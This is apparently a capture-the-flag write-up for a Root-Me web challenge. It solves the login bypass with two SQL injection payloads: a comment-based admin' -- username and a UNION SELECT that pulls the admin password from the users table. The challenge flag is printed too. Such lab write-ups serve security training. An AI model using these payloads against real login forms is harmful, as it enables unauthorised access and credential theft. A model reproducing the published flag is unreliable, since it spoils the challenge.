SQL injection - Authentication

• Points: 30
• Link: https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-authentication

Statement

Retrieve the administrator password

Solution

username: admin' --
password: <any dump things here>

Then it will show admin’s information, but password is in bullet. View source code to get it.

The flag is

t0_W34k!$

Another way is

username: admin
password: ' union select password, username from users where username = 'admin

Note: username is admin. administrator will not work!